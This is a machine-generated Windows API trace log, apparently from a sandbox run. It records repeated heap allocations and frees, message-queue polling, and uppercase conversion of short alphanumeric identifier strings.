[0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0122.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fa0 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13aff) returned 0x37c0048 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0122.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0122.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0122.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.425] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0122.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0122.425] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.426] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0122.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0122.428] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.428] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.429] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0122.429] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0122.429] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.429] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa480 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0122.429] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.430] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0122.430] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0122.430] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0122.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 